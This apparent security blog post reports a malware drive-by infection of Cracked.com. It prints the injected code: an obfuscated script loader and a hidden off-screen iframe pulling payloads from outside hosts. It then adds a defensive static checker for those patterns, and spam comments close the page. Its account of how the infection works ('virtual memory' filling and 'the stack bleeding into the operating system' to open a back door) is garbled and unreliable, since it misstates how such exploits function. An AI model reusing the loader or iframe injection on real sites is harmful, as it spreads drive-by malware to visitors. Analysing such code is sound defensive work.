Cracked[dot]com Spreads Malware

On Monday, November 11th, it was discovered that Cracked[dot]com was infected by malware performing drive-by downloads. The discovery comes from Barracuda Labs Research.

The malware was spread through a drive-by download. The number of systems it has infected is unknown. Given that the site is ranked by Alexa as number 289 in the U.S. and 654 worldwide, the number is presumed to be high.

The malware is introduced through JavaScript code that directs a registration call to the domain crackedcdm[dot]com. This domain was registered on November 4th, which suggests the site may have been infected since then. Here is a small sample of the JavaScript registration call:

var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php";
var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; var vol54 = "src";
// the fragments are concatenated into: <script src=http://i.crackedcdm.com/i.php></script>
document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");

Once the registration call is completed the following iframe pointing to p68ei5.degreeexplore.biz is inserted:

var urla = 'http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html';
var divTag = document.createElement('div');
divTag.id = 'ad3';
document.body.appendChild(divTag);
var fr3 = document.createElement('iframe');
fr3.width = '88px';
fr3.height = '31px';
// an 88x31 iframe placed 8000px off the left edge, so it never renders visibly
fr3.setAttribute('style', 'position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');
fr3.setAttribute('src', urla);
document.getElementById('ad3').appendChild(fr3);

At this point the iframe sends a flurry of malicious PDF, Java, HTML, and JavaScript files into the victim's browser. This causes virtual memory to become full.
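Both snippets above can be checked statically rather than executed. The following is an added example, not code from the post or from Barracuda Labs: it resolves the string-concatenation trick the loader uses and flags the off-screen iframe pattern. The two sample inputs are constructed, trimmed copies of the snippets quoted above, and the function names are my own.

```javascript
// Added example, not code from the post: a static checker for the two loader
// patterns described above. It resolves the string-concatenation trick without
// executing anything, and flags the off-screen iframe injection.
// Both sample inputs are constructed, trimmed copies of the snippets in the post.
const LOADER = `var tyi = "cdm."; var itwo = "cracked"; var itto = "/"; var phw = "php"; var jfw = "src"; var fscr = "script"; var twi = "i"; var htp = "http"; document.write("<"+fscr+" "+jfw+"="+htp+":"+itto+""+itto+""+twi+"."+itwo+""+tyi+"com"+itto+""+twi+"."+phw+"><"+itto+""+fscr+">");`;
const IFRAME = `var urla='http://p68ei5.degreeexplore.biz:53331/51fd0e1afd1243f00bd4f6473a0bfc41.html';var fr3=document.createElement('iframe');fr3.width='88px';fr3.height='31px';fr3.setAttribute('style','position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;');fr3.setAttribute('src',urla);`;

// Collect simple `var name = "literal";` assignments into a lookup table.
function collectStringVars(js) {
  const vars = {};
  const re = /var\s+([A-Za-z_$][\w$]*)\s*=\s*(['"])(.*?)\2\s*;/g;
  for (let m; (m = re.exec(js)) !== null;) vars[m[1]] = m[3];
  return vars;
}

// Resolve a `+`-joined expression of string literals and known variables.
// (Literals that themselves contain '+' are not handled; the loader uses none.)
function resolveConcat(expr, vars) {
  return expr.split('+').map((tok) => {
    const t = tok.trim();
    const lit = t.match(/^(['"])(.*)\1$/);
    if (lit) return lit[2];
    if (Object.prototype.hasOwnProperty.call(vars, t)) return vars[t];
    throw new Error('unresolved token: ' + t);
  }).join('');
}

// Return the markup each document.write(...) call would emit.
function decodeDocumentWrites(js) {
  const vars = collectStringVars(js);
  const out = [];
  const re = /document\.write\(([^;]*?)\)\s*;/g;
  for (let m; (m = re.exec(js)) !== null;) out.push(resolveConcat(m[1], vars));
  return out;
}

// Indicators of the injected iframe: created at runtime, pushed far off-screen,
// and loading a URL on a non-standard port.
function hiddenIframeIndicators(js) {
  const findings = [];
  if (/createElement\(\s*['"]iframe['"]\s*\)/.test(js)) findings.push('runtime-created iframe');
  const left = js.match(/left:\s*(-\d+)px/);
  if (left && Number(left[1]) <= -1000) findings.push('off-screen position: left ' + left[1] + 'px');
  const port = js.match(/https?:\/\/[^'"\s]+:(\d+)\//);
  if (port && !['80', '443'].includes(port[1])) findings.push('non-standard port ' + port[1]);
  return findings;
}

console.log(decodeDocumentWrites(LOADER), hiddenIframeIndicators(IFRAME));
```

Running it prints the decoded script tag pointing at i.crackedcdm.com and three indicators for the iframe snippet, while the loader snippet alone yields no iframe indicators.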

[Image: CrackedMalware.JPG]

When virtual memory becomes full, the stack bleeds out into the operating system, creating a back door to inject malware. The injection process goes undetected by antivirus software, making live web protection ineffective. This is a known Windows vulnerability typically exploited in Outlook by email malware. The malware can only be detected during a deep scan of the full system, and only if its definition exists in the antivirus's definition file.

For more detail on the virus file, see the malwr website.

Cracked[dot]com waited until Tuesday to respond to the Barracuda Labs report. They responded in a forum claiming they had fixed the site on Tuesday. Barracuda Labs claims the site is still infected and that similar attacks on the site seem to be a recurring problem.

2 thoughts on “Cracked[dot]com Spreads Malware”

  1. That is a great tip particularly to those new to the blogosphere.
    Brief but very precise information… Thank you for sharing this one.

    A must read post!

  2. I got what you mean, thank you for posting. Woh, I am glad to find this website through Google. “Spare no expense to make everything as economical as possible.” by Samuel Goldwyn.
